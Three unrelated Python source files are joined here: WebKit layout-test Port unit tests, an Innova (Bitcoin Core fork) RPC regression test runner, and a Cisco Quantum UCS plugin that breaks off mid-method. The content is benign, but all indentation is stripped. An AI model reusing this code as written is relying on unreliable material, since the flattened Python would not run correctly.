new_file.write(contents.encode(encoding))
new_file.flush()
return new_file
def test_pretty_patch_os_error(self):
port = self.make_port(executive=executive_mock.MockExecutive2(exception=OSError))
oc = OutputCapture()
oc.capture_output()
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
# This tests repeated calls to make sure we cache the result.
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
oc.restore_output()
def test_pretty_patch_script_error(self):
# FIXME: This is some ugly white-box test hacking ...
port = self.make_port(executive=executive_mock.MockExecutive2(exception=ScriptError))
port._pretty_patch_available = True
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
# This tests repeated calls to make sure we cache the result.
self.assertEqual(port.pretty_patch_text("patch.txt"),
port._pretty_patch_error_html)
def integration_test_run_wdiff(self):
executive = Executive()
# This may fail on some systems. We could ask the port
# object for the wdiff path, but since we don't know what
# port object to use, this is sufficient for now.
try:
wdiff_path = executive.run_command(["which", "wdiff"]).rstrip()
except Exception, e:
wdiff_path = None
port = self.make_port(executive=executive)
port._path_to_wdiff = lambda: wdiff_path
if wdiff_path:
# "with tempfile.NamedTemporaryFile() as actual" does not seem to work in Python 2.5
actual = self._file_with_contents(u"foo")
expected = self._file_with_contents(u"bar")
wdiff = port._run_wdiff(actual.name, expected.name)
expected_wdiff = "<head><style>.del { background: #faa; } .add { background: #afa; }</style></head><pre><span class=del>foo</span><span class=add>bar</span></pre>"
self.assertEqual(wdiff, expected_wdiff)
# Running the full wdiff_text method should give the same result.
port._wdiff_available = True # In case it's somehow already disabled.
wdiff = port.wdiff_text(actual.name, expected.name)
self.assertEqual(wdiff, expected_wdiff)
# wdiff should still be available after running wdiff_text with a valid diff.
self.assertTrue(port._wdiff_available)
actual.close()
expected.close()
# Bogus paths should raise a script error.
self.assertRaises(ScriptError, port._run_wdiff, "/does/not/exist", "/does/not/exist2")
self.assertRaises(ScriptError, port.wdiff_text, "/does/not/exist", "/does/not/exist2")
# wdiff will still be available after running wdiff_text with invalid paths.
self.assertTrue(port._wdiff_available)
# If wdiff does not exist _run_wdiff should throw an OSError.
port._path_to_wdiff = lambda: "/invalid/path/to/wdiff"
self.assertRaises(OSError, port._run_wdiff, "foo", "bar")
# wdiff_text should not throw an error if wdiff does not exist.
self.assertEqual(port.wdiff_text("foo", "bar"), "")
# However wdiff should not be available after running wdiff_text if wdiff is missing.
self.assertFalse(port._wdiff_available)
def test_wdiff_text(self):
port = self.make_port()
port.wdiff_available = lambda: True
port._run_wdiff = lambda a, b: 'PASS'
self.assertEqual('PASS', port.wdiff_text(None, None))
def test_diff_text(self):
port = self.make_port()
# Make sure that we don't run into decoding exceptions when the
# filenames are unicode, with regular or malformed input (expected or
# actual input is always raw bytes, not unicode).
port.diff_text('exp', 'act', 'exp.txt', 'act.txt')
port.diff_text('exp', 'act', u'exp.txt', 'act.txt')
port.diff_text('exp', 'act', u'a\xac\u1234\u20ac\U00008000', 'act.txt')
port.diff_text('exp' + chr(255), 'act', 'exp.txt', 'act.txt')
port.diff_text('exp' + chr(255), 'act', u'exp.txt', 'act.txt')
# Though expected and actual files should always be read in with no
# encoding (and be stored as str objects), test unicode inputs just to
# be safe.
port.diff_text(u'exp', 'act', 'exp.txt', 'act.txt')
port.diff_text(
u'a\xac\u1234\u20ac\U00008000', 'act', 'exp.txt', 'act.txt')
# And make sure we actually get diff output.
diff = port.diff_text('foo', 'bar', 'exp.txt', 'act.txt')
self.assertIn('foo', diff)
self.assertIn('bar', diff)
self.assertIn('exp.txt', diff)
self.assertIn('act.txt', diff)
self.assertNotIn('nosuchthing', diff)
def test_setup_test_run(self):
port = self.make_port()
# This routine is a no-op. We just test it for coverage.
port.setup_test_run()
def test_test_dirs(self):
port = self.make_port()
port.host.filesystem.write_text_file(port.layout_tests_dir() + '/canvas/test', '')
port.host.filesystem.write_text_file(port.layout_tests_dir() + '/css2.1/test', '')
dirs = port.test_dirs()
self.assertIn('canvas', dirs)
self.assertIn('css2.1', dirs)
def test_skipped_perf_tests(self):
port = self.make_port()
def add_text_file(dirname, filename, content='some content'):
dirname = port.host.filesystem.join(port.perf_tests_dir(), dirname)
port.host.filesystem.maybe_make_directory(dirname)
port.host.filesystem.write_text_file(port.host.filesystem.join(dirname, filename), content)
add_text_file('inspector', 'test1.html')
add_text_file('inspector', 'unsupported_test1.html')
add_text_file('inspector', 'test2.html')
add_text_file('inspector/resources', 'resource_file.html')
add_text_file('unsupported', 'unsupported_test2.html')
add_text_file('', 'Skipped', '\n'.join(['Layout', '', 'SunSpider', 'Supported/some-test.html']))
self.assertEqual(port.skipped_perf_tests(), ['Layout', 'SunSpider', 'Supported/some-test.html'])
def test_get_option__set(self):
options, args = optparse.OptionParser().parse_args([])
options.foo = 'bar'
port = self.make_port(options=options)
self.assertEqual(port.get_option('foo'), 'bar')
def test_get_option__unset(self):
port = self.make_port()
self.assertIsNone(port.get_option('foo'))
def test_get_option__default(self):
port = self.make_port()
self.assertEqual(port.get_option('foo', 'bar'), 'bar')
def test_additional_platform_directory(self):
port = self.make_port(port_name='foo')
port.default_baseline_search_path = lambda: ['LayoutTests/platform/foo']
layout_test_dir = port.layout_tests_dir()
test_file = 'fast/test.html'
# No additional platform directory
self.assertEqual(
port.expected_baselines(test_file, '.txt'),
[(None, 'fast/test-expected.txt')])
self.assertEqual(port.baseline_path(), 'LayoutTests/platform/foo')
# Simple additional platform directory
port._options.additional_platform_directory = ['/tmp/local-baselines']
port._filesystem.write_text_file('/tmp/local-baselines/fast/test-expected.txt', 'foo')
self.assertEqual(
port.expected_baselines(test_file, '.txt'),
[('/tmp/local-baselines', 'fast/test-expected.txt')])
self.assertEqual(port.baseline_path(), '/tmp/local-baselines')
# Multiple additional platform directories
port._options.additional_platform_directory = ['/foo', '/tmp/local-baselines']
self.assertEqual(
port.expected_baselines(test_file, '.txt'),
[('/tmp/local-baselines', 'fast/test-expected.txt')])
self.assertEqual(port.baseline_path(), '/foo')
def test_nonexistant_expectations(self):
port = self.make_port(port_name='foo')
port.expectations_files = lambda: ['/mock-checkout/LayoutTests/platform/exists/TestExpectations', '/mock-checkout/LayoutTests/platform/nonexistant/TestExpectations']
port._filesystem.write_text_file('/mock-checkout/LayoutTests/platform/exists/TestExpectations', '')
self.assertEqual('\n'.join(port.expectations_dict().keys()), '/mock-checkout/LayoutTests/platform/exists/TestExpectations')
def test_additional_expectations(self):
port = self.make_port(port_name='foo')
port.port_name = 'foo'
port._filesystem.write_text_file('/mock-checkout/LayoutTests/platform/foo/TestExpectations', '')
port._filesystem.write_text_file(
'/tmp/additional-expectations-1.txt', 'content1\n')
port._filesystem.write_text_file(
'/tmp/additional-expectations-2.txt', 'content2\n')
self.assertEqual('\n'.join(port.expectations_dict().values()), '')
port._options.additional_expectations = [
'/tmp/additional-expectations-1.txt']
self.assertEqual('\n'.join(port.expectations_dict().values()), '\ncontent1\n')
port._options.additional_expectations = [
'/tmp/nonexistent-file', '/tmp/additional-expectations-1.txt']
self.assertEqual('\n'.join(port.expectations_dict().values()), '\ncontent1\n')
port._options.additional_expectations = [
'/tmp/additional-expectations-1.txt', '/tmp/additional-expectations-2.txt']
self.assertEqual('\n'.join(port.expectations_dict().values()), '\ncontent1\n\ncontent2\n')
def test_additional_env_var(self):
port = self.make_port(options=optparse.Values({'additional_env_var': ['FOO=BAR', 'BAR=FOO']}))
self.assertEqual(port.get_option('additional_env_var'), ['FOO=BAR', 'BAR=FOO'])
environment = port.setup_environ_for_server()
self.assertTrue(('FOO' in environment) & ('BAR' in environment))
self.assertEqual(environment['FOO'], 'BAR')
self.assertEqual(environment['BAR'], 'FOO')
def test_uses_test_expectations_file(self):
port = self.make_port(port_name='foo')
port.port_name = 'foo'
port.path_to_test_expectations_file = lambda: '/mock-results/TestExpectations'
self.assertFalse(port.uses_test_expectations_file())
port._filesystem = MockFileSystem({'/mock-results/TestExpectations': ''})
self.assertTrue(port.uses_test_expectations_file())
def test_find_no_paths_specified(self):
port = self.make_port(with_tests=True)
layout_tests_dir = port.layout_tests_dir()
tests = port.tests([])
self.assertNotEqual(len(tests), 0)
def test_find_one_test(self):
port = self.make_port(with_tests=True)
tests = port.tests(['failures/expected/image.html'])
self.assertEqual(len(tests), 1)
def test_find_glob(self):
port = self.make_port(with_tests=True)
tests = port.tests(['failures/expected/im*'])
self.assertEqual(len(tests), 2)
def test_find_with_skipped_directories(self):
port = self.make_port(with_tests=True)
tests = port.tests(['userscripts'])
self.assertNotIn('userscripts/resources/iframe.html', tests)
def test_find_with_skipped_directories_2(self):
port = self.make_port(with_tests=True)
tests = port.tests(['userscripts/resources'])
self.assertEqual(tests, [])
def test_is_test_file(self):
filesystem = MockFileSystem()
self.assertTrue(Port._is_test_file(filesystem, '', 'foo.html'))
self.assertTrue(Port._is_test_file(filesystem, '', 'foo.shtml'))
self.assertTrue(Port._is_test_file(filesystem, '', 'foo.svg'))
self.assertTrue(Port._is_test_file(filesystem, '', 'test-ref-test.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo.png'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected.svg'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected.xht'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected-mismatch.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected-mismatch.svg'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-expected-mismatch.xhtml'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-ref.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-notref.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-notref.xht'))
self.assertFalse(Port._is_test_file(filesystem, '', 'foo-ref.xhtml'))
self.assertFalse(Port._is_test_file(filesystem, '', 'ref-foo.html'))
self.assertFalse(Port._is_test_file(filesystem, '', 'notref-foo.xhr'))
def test_is_reference_html_file(self):
filesystem = MockFileSystem()
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-expected.html'))
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-expected-mismatch.xml'))
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-ref.xhtml'))
self.assertTrue(Port.is_reference_html_file(filesystem, '', 'foo-notref.svg'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo.html'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.txt'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.shtml'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.php'))
self.assertFalse(Port.is_reference_html_file(filesystem, '', 'foo-expected.mht'))
def test_parse_reftest_list(self):
port = self.make_port(with_tests=True)
port.host.filesystem.files['bar/reftest.list'] = "\n".join(["== test.html test-ref.html",
"",
"# some comment",
"!= test-2.html test-notref.html # more comments",
"== test-3.html test-ref.html",
"== test-3.html test-ref2.html",
"!= test-3.html test-notref.html"])
reftest_list = Port._parse_reftest_list(port.host.filesystem, 'bar')
self.assertEqual(reftest_list, {'bar/test.html': [('==', 'bar/test-ref.html')],
'bar/test-2.html': [('!=', 'bar/test-notref.html')],
'bar/test-3.html': [('==', 'bar/test-ref.html'), ('==', 'bar/test-ref2.html'), ('!=', 'bar/test-notref.html')]})
def test_reference_files(self):
port = self.make_port(with_tests=True)
self.assertEqual(port.reference_files('passes/svgreftest.svg'), [('==', port.layout_tests_dir() + '/passes/svgreftest-expected.svg')])
self.assertEqual(port.reference_files('passes/xhtreftest.svg'), [('==', port.layout_tests_dir() + '/passes/xhtreftest-expected.html')])
self.assertEqual(port.reference_files('passes/phpreftest.php'), [('!=', port.layout_tests_dir() + '/passes/phpreftest-expected-mismatch.svg')])
def test_operating_system(self):
self.assertEqual('mac', self.make_port().operating_system())
def test_http_server_supports_ipv6(self):
port = self.make_port()
self.assertTrue(port.http_server_supports_ipv6())
port.host.platform.os_name = 'cygwin'
self.assertFalse(port.http_server_supports_ipv6())
port.host.platform.os_name = 'win'
self.assertTrue(port.http_server_supports_ipv6())
def test_check_httpd_success(self):
port = self.make_port(executive=MockExecutive2())
port._path_to_apache = lambda: '/usr/sbin/httpd'
capture = OutputCapture()
capture.capture_output()
self.assertTrue(port.check_httpd())
_, _, logs = capture.restore_output()
self.assertEqual('', logs)
def test_httpd_returns_error_code(self):
port = self.make_port(executive=MockExecutive2(exit_code=1))
port._path_to_apache = lambda: '/usr/sbin/httpd'
capture = OutputCapture()
capture.capture_output()
self.assertFalse(port.check_httpd())
_, _, logs = capture.restore_output()
self.assertEqual('httpd seems broken. Cannot run http tests.\n', logs)
def test_test_exists(self):
port = self.make_port(with_tests=True)
self.assertTrue(port.test_exists('passes'))
self.assertTrue(port.test_exists('passes/text.html'))
self.assertFalse(port.test_exists('passes/does_not_exist.html'))
self.assertTrue(port.test_exists('virtual'))
self.assertFalse(port.test_exists('virtual/does_not_exist.html'))
self.assertTrue(port.test_exists('virtual/passes/text.html'))
def test_test_isfile(self):
port = self.make_port(with_tests=True)
self.assertFalse(port.test_isfile('passes'))
self.assertTrue(port.test_isfile('passes/text.html'))
self.assertFalse(port.test_isfile('passes/does_not_exist.html'))
self.assertFalse(port.test_isfile('virtual'))
self.assertTrue(port.test_isfile('virtual/passes/text.html'))
self.assertFalse(port.test_isfile('virtual/does_not_exist.html'))
def test_test_isdir(self):
port = self.make_port(with_tests=True)
self.assertTrue(port.test_isdir('passes'))
self.assertFalse(port.test_isdir('passes/text.html'))
self.assertFalse(port.test_isdir('passes/does_not_exist.html'))
self.assertFalse(port.test_isdir('passes/does_not_exist/'))
self.assertTrue(port.test_isdir('virtual'))
self.assertFalse(port.test_isdir('virtual/does_not_exist.html'))
self.assertFalse(port.test_isdir('virtual/does_not_exist/'))
self.assertFalse(port.test_isdir('virtual/passes/text.html'))
def test_tests(self):
port = self.make_port(with_tests=True)
tests = port.tests([])
self.assertIn('passes/text.html', tests)
self.assertIn('virtual/passes/text.html', tests)
tests = port.tests(['passes'])
self.assertIn('passes/text.html', tests)
self.assertIn('passes/passes/test-virtual-passes.html', tests)
self.assertNotIn('virtual/passes/text.html', tests)
tests = port.tests(['virtual/passes'])
self.assertNotIn('passes/text.html', tests)
self.assertIn('virtual/passes/test-virtual-passes.html', tests)
self.assertIn('virtual/passes/passes/test-virtual-passes.html', tests)
self.assertNotIn('virtual/passes/test-virtual-virtual/passes.html', tests)
self.assertNotIn('virtual/passes/virtual/passes/test-virtual-passes.html', tests)
def test_build_path(self):
port = self.make_port(options=optparse.Values({'build_directory': '/my-build-directory/'}))
self.assertEqual(port._build_path(), '/my-build-directory/Release')
class NaturalCompareTest(unittest.TestCase):
def setUp(self):
self._port = TestPort(MockSystemHost())
def assert_cmp(self, x, y, result):
self.assertEqual(cmp(self._port._natural_sort_key(x), self._port._natural_sort_key(y)), result)
def test_natural_compare(self):
self.assert_cmp('a', 'a', 0)
self.assert_cmp('ab', 'a', 1)
self.assert_cmp('a', 'ab', -1)
self.assert_cmp('', '', 0)
self.assert_cmp('', 'ab', -1)
self.assert_cmp('1', '2', -1)
self.assert_cmp('2', '1', 1)
self.assert_cmp('1', '10', -1)
self.assert_cmp('2', '10', -1)
self.assert_cmp('foo_1.html', 'foo_2.html', -1)
self.assert_cmp('foo_1.1.html', 'foo_2.html', -1)
self.assert_cmp('foo_1.html', 'foo_10.html', -1)
self.assert_cmp('foo_2.html', 'foo_10.html', -1)
self.assert_cmp('foo_23.html', 'foo_10.html', 1)
self.assert_cmp('foo_23.html', 'foo_100.html', -1)
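# A minimal sketch of a natural-sort key of the kind exercised above
# (illustrative; the real key lives on the Port object):
#
#   def natural_sort_key(s):
#       return [int(p) if p.isdigit() else p for p in re.split(r'(\d+)', s)]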
class KeyCompareTest(unittest.TestCase):
def setUp(self):
self._port = TestPort(MockSystemHost())
def assert_cmp(self, x, y, result):
self.assertEqual(cmp(self._port.test_key(x), self._port.test_key(y)), result)
def test_test_key(self):
self.assert_cmp('/a', '/a', 0)
self.assert_cmp('/a', '/b', -1)
self.assert_cmp('/a2', '/a10', -1)
self.assert_cmp('/a2/foo', '/a10/foo', -1)
self.assert_cmp('/a/foo11', '/a/foo2', 1)
self.assert_cmp('/ab', '/a/a/b', -1)
self.assert_cmp('/a/a/b', '/ab', 1)
self.assert_cmp('/foo-bar/baz', '/foo/baz', -1)
|
|
#!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Run Regression Test Suite
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts, other
than:
- `-extended`: run the "extended" test suite in addition to the basic one.
- `-win`: signal that this is running in a Windows environment, and we
should run the tests.
- `--coverage`: this generates a basic coverage report for the RPC
interface.
For a description of arguments recognized by test scripts, see
`qa/pull-tester/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
from tests_config import *
#If imported values are not defined then set to zero (or disabled)
if 'ENABLE_WALLET' not in vars():
ENABLE_WALLET=0
if 'ENABLE_BITCOIND' not in vars():
ENABLE_BITCOIND=0
if 'ENABLE_UTILS' not in vars():
ENABLE_UTILS=0
if 'ENABLE_ZMQ' not in vars():
ENABLE_ZMQ=0
ENABLE_COVERAGE=0
#Create a set to store arguments and create the passOn string
opts = set()
passOn = ""
p = re.compile("^--")
bold = ("","")
if (os.name == 'posix'):
bold = ('\033[0m', '\033[1m')
for arg in sys.argv[1:]:
if arg == '--coverage':
ENABLE_COVERAGE = 1
elif (p.match(arg) or arg == "-h"):
passOn += " " + arg
else:
opts.add(arg)
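# e.g. `rpc-tests.py wallet.py -extended --tracerpc` leaves
# opts == {'wallet.py', '-extended'} and passOn == ' --tracerpc'
# (--tracerpc is just an illustrative pass-through flag here).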
#Set env vars
buildDir = BUILDDIR
if "INNOVAD" not in os.environ:
os.environ["INNOVAD"] = buildDir + '/src/innovad' + EXEEXT
if "INNOVACLI" not in os.environ:
os.environ["INNOVACLI"] = buildDir + '/src/innova-cli' + EXEEXT
if EXEEXT == ".exe" and "-win" not in opts:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print "Win tests currently disabled by default. Use -win option to enable"
sys.exit(0)
if not (ENABLE_WALLET == 1 and ENABLE_UTILS == 1 and ENABLE_BITCOIND == 1):
print "No rpc tests to run. Wallet, utils, and bitcoind must all be enabled"
sys.exit(0)
# python-zmq may not be installed. Handle this gracefully and with some helpful info
if ENABLE_ZMQ:
try:
import zmq
except ImportError as e:
print("ERROR: \"import zmq\" failed. Set ENABLE_ZMQ=0 or " \
"to run zmq tests, see dependency info in /qa/README.md.")
raise e
#Tests
testScripts = [
'bip68-112-113-p2p.py',
'wallet.py',
'listtransactions.py',
'receivedby.py',
'mempool_resurrect_test.py',
'txn_doublespend.py --mineblock',
'txn_clone.py',
'getchaintips.py',
'rawtransactions.py',
'rest.py',
'mempool_spendcoinbase.py',
'mempool_reorg.py',
'mempool_limit.py',
'httpbasics.py',
'multi_rpc.py',
'zapwallettxes.py',
'proxy_test.py',
'merkle_blocks.py',
'fundrawtransaction.py',
'signrawtransactions.py',
'walletbackup.py',
'nodehandling.py',
'reindex.py',
'addressindex.py',
'timestampindex.py',
'spentindex.py',
'decodescript.py',
'p2p-fullblocktest.py', # NOTE: needs innova_hash to pass
'blockchain.py',
'disablewallet.py',
'sendheaders.py', # NOTE: needs innova_hash to pass
'keypool.py',
'prioritise_transaction.py',
'invalidblockrequest.py', # NOTE: needs innova_hash to pass
'invalidtxrequest.py', # NOTE: needs innova_hash to pass
'abandonconflict.py',
'p2p-versionbits-warning.py',
]
if ENABLE_ZMQ:
testScripts.append('zmq_test.py')
testScriptsExt = [
'bip9-softforks.py',
'bip65-cltv.py',
'bip65-cltv-p2p.py', # NOTE: needs innova_hash to pass
'bip68-sequence.py',
'bipdersig-p2p.py', # NOTE: needs innova_hash to pass
'bipdersig.py',
'getblocktemplate_longpoll.py', # FIXME: "socket.error: [Errno 54] Connection reset by peer" on my Mac, same as https://github.com/bitcoin/bitcoin/issues/6651
'getblocktemplate_proposals.py',
'txn_doublespend.py',
'txn_clone.py --mineblock',
# 'pruning.py', # Prune mode is incompatible with -txindex.
'forknotify.py',
'invalidateblock.py',
# 'rpcbind_test.py', #temporary, bug in libevent, see #6655
'smartfees.py',
'maxblocksinflight.py',
'p2p-acceptblock.py', # NOTE: needs innova_hash to pass
'mempool_packages.py',
'maxuploadtarget.py',
# 'replace-by-fee.py', # RBF is disabled in Innova Core
]
def runtests():
coverage = None
if ENABLE_COVERAGE:
coverage = RPCCoverage()
print("Initializing coverage directory at %s\n" % coverage.dir)
rpcTestDir = buildDir + '/qa/rpc-tests/'
run_extended = '-extended' in opts
cov_flag = coverage.flag if coverage else ''
flags = " --srcdir %s/src %s %s" % (buildDir, cov_flag, passOn)
#Run Tests
for i in range(len(testScripts)):
if (len(opts) == 0
or (len(opts) == 1 and "-win" in opts )
or run_extended
or testScripts[i] in opts
or re.sub(".py$", "", testScripts[i]) in opts ):
print("Running testscript %s%s%s ..." % (bold[1], testScripts[i], bold[0]))
time0 = time.time()
subprocess.check_call(
rpcTestDir + testScripts[i] + flags, shell=True)
print("Duration: %s s\n" % (int(time.time() - time0)))
# exit if help is called so we print just one set of
# instructions
p = re.compile(" -h| --help")
if p.match(passOn):
sys.exit(0)
# Run Extended Tests
for i in range(len(testScriptsExt)):
if (run_extended or testScriptsExt[i] in opts
or re.sub(".py$", "", testScriptsExt[i]) in opts):
print(
"Running 2nd level testscript "
+ "%s%s%s ..." % (bold[1], testScriptsExt[i], bold[0]))
time0 = time.time()
subprocess.check_call(
rpcTestDir + testScriptsExt[i] + flags, shell=True)
print("Duration: %s s\n" % (int(time.time() - time0)))
if coverage:
coverage.report_rpc_coverage()
print("Cleaning up coverage data")
coverage.cleanup()
class RPCCoverage(object):
"""
Coverage reporting utilities for pull-tester.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: qa/rpc-tests/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir %s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % i) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
        # This is shared from `qa/rpc-tests/test_framework/coverage.py`
REFERENCE_FILENAME = 'rpc_interface.txt'
COVERAGE_FILE_PREFIX = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, REFERENCE_FILENAME)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(COVERAGE_FILE_PREFIX):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
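# Illustrative standalone use of RPCCoverage (mirrors what runtests() does;
# the directory name is an example, mkdtemp picks the actual path):
#   cov = RPCCoverage()
#   flags = cov.flag            # e.g. '--coveragedir /tmp/coverageXXXXXX'
#   ... run the test scripts with `flags` appended ...
#   cov.report_rpc_coverage()
#   cov.cleanup()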
if __name__ == '__main__':
runtests()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sumit Naiksatam, Cisco Systems, Inc.
#
import logging
from quantum.db import api as db
from quantum.openstack.common import importutils
from quantum.plugins.cisco.common import cisco_constants as const
from quantum.plugins.cisco.common import cisco_credentials_v2 as cred
from quantum.plugins.cisco.common import cisco_exceptions as cexc
from quantum.plugins.cisco.common import cisco_utils as cutil
from quantum.plugins.cisco.db import network_db_v2 as cdb
from quantum.plugins.cisco.db import ucs_db_v2 as udb
from quantum.plugins.cisco.l2device_plugin_base import L2DevicePluginBase
from quantum.plugins.cisco.ucs import cisco_ucs_configuration as conf
LOG = logging.getLogger(__name__)
class UCSVICPlugin(L2DevicePluginBase):
"""UCS Device Plugin"""
def __init__(self):
self._driver = importutils.import_object(conf.UCSM_DRIVER)
LOG.debug("Loaded driver %s\n" % conf.UCSM_DRIVER)
# TODO (Sumit) Make the counter per UCSM
self._port_profile_counter = 0
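    # Illustrative call pattern (a sketch): every public method below expects
    # the target UCSM's IP address in kwargs under const.DEVICE_IP, e.g.
    #   plugin = UCSVICPlugin()
    #   plugin.get_all_networks(tenant_id, **{const.DEVICE_IP: '10.0.0.1'})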
def get_all_networks(self, tenant_id, **kwargs):
"""
        Returns a list of dictionaries, one <network_uuid, network_name>
        entry for each network belonging to the specified tenant.
"""
LOG.debug("UCSVICPlugin:get_all_networks() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
networks_list = db.network_list(tenant_id)
new_networks_list = []
for network in networks_list:
new_network_dict = cutil.make_net_dict(network[const.UUID],
network[const.NETWORKNAME],
[])
new_networks_list.append(new_network_dict)
return new_networks_list
def create_network(self, tenant_id, net_name, net_id, vlan_name, vlan_id,
**kwargs):
"""
Creates a new Virtual Network, and assigns it
a symbolic name.
"""
LOG.debug("UCSVICPlugin:create_network() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
self._driver.create_vlan(vlan_name, str(vlan_id), self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
ports_on_net = []
new_network_dict = cutil.make_net_dict(net_id,
net_name,
ports_on_net)
return new_network_dict
def delete_network(self, tenant_id, net_id, **kwargs):
"""
Deletes the network with the specified network identifier
belonging to the specified tenant.
"""
LOG.debug("UCSVICPlugin:delete_network() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
vlan_binding = cdb.get_vlan_binding(net_id)
vlan_name = vlan_binding[const.VLANNAME]
self._driver.delete_vlan(vlan_name, self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
        # NOTE(Rohit): passing an empty network name; might not need fixing
net_dict = cutil.make_net_dict(net_id,
"",
[])
return net_dict
def get_network_details(self, tenant_id, net_id, **kwargs):
"""
        Retrieves the details of the Virtual Network with the
        specified network identifier.
"""
LOG.debug("UCSVICPlugin:get_network_details() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
network = db.network_get(net_id)
ports_list = network[const.NETWORKPORTS]
ports_on_net = []
for port in ports_list:
new_port = cutil.make_port_dict(port[const.UUID],
port[const.PORTSTATE],
port[const.NETWORKID],
port[const.INTERFACEID])
ports_on_net.append(new_port)
new_network = cutil.make_net_dict(network[const.UUID],
network[const.NETWORKNAME],
ports_on_net)
return new_network
def update_network(self, tenant_id, net_id, **kwargs):
"""
Updates the symbolic name belonging to a particular
Virtual Network.
"""
LOG.debug("UCSVICPlugin:update_network() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
network = db.network_get(net_id)
net_dict = cutil.make_net_dict(network[const.UUID],
network[const.NETWORKNAME],
[])
return net_dict
def get_all_ports(self, tenant_id, net_id, **kwargs):
"""
Retrieves all port identifiers belonging to the
specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:get_all_ports() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
network = db.network_get(net_id)
ports_list = network[const.NETWORKPORTS]
ports_on_net = []
for port in ports_list:
port_binding = udb.get_portbinding(port[const.UUID])
ports_on_net.append(port_binding)
return ports_on_net
def create_port(self, tenant_id, net_id, port_state, port_id, **kwargs):
"""
Creates a port on the specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:create_port() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
qos = None
ucs_inventory = kwargs[const.UCS_INVENTORY]
least_rsvd_blade_dict = kwargs[const.LEAST_RSVD_BLADE_DICT]
chassis_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_CHASSIS]
blade_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_ID]
blade_data_dict = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_DATA]
new_port_profile = self._create_port_profile(tenant_id, net_id,
port_id,
conf.DEFAULT_VLAN_NAME,
conf.DEFAULT_VLAN_ID)
profile_name = new_port_profile[const.PROFILE_NAME]
rsvd_nic_dict = ucs_inventory.reserve_blade_interface(
self._ucsm_ip, chassis_id,
blade_id, blade_data_dict,
tenant_id, port_id,
profile_name)
port_binding = udb.update_portbinding(port_id,
portprofile_name=profile_name,
vlan_name=conf.DEFAULT_VLAN_NAME,
vlan_id=conf.DEFAULT_VLAN_ID,
qos=qos)
return port_binding
def delete_port(self, tenant_id, net_id, port_id, **kwargs):
"""
Deletes a port on a specified Virtual Network,
